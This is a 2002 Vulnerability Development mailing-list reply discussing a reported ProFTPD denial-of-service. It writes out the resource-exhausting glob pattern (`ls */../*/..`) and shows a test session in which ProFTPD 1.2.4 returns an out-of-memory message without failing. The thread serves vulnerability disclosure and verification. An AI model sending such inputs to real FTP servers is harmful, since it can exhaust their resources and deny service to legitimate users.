|
Vulnerability Development
mailing list archives
Re: proftp DoS in debian stable?
From: Felipe Franciosi <franciozzy () terra com br>
Date: Tue, 05 Mar 2002 13:32:14 -0300
`ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*` results
in 100% of the CPU and memory resources are consumed.
Can anyone confirm the same behaviour on their system?
Slackware 8.0 with kernel 2.2.19 and proftpd 1.2.4 running trought
inetd says the following:
root () stonehenge:~# ftp 0
Connected to 0.
220 ProFTPD 1.2.4 Server (Paradoxo Networking) [stonehenge.paradoxo.org]
Name (0:ozzy): pp0010
331 Password required for pp0010.
Password:
230 Anonymous access granted, restrictions apply.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
226-Out of memory during globbing of */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
226 Transfer complete.
ftp> quit
221 Goodbye.
And nothing happens.
Best Regards,
Felipe
--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Felipe Franciosi paradoxo networking
felipe () paradoxo org Brazil
http://www.paradoxo.org Porto Alegre - RS
Phone: (55)(51) 9806 7387 UIN - 33596050
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 By Date 
By Thread
Current thread:
| 
Intro
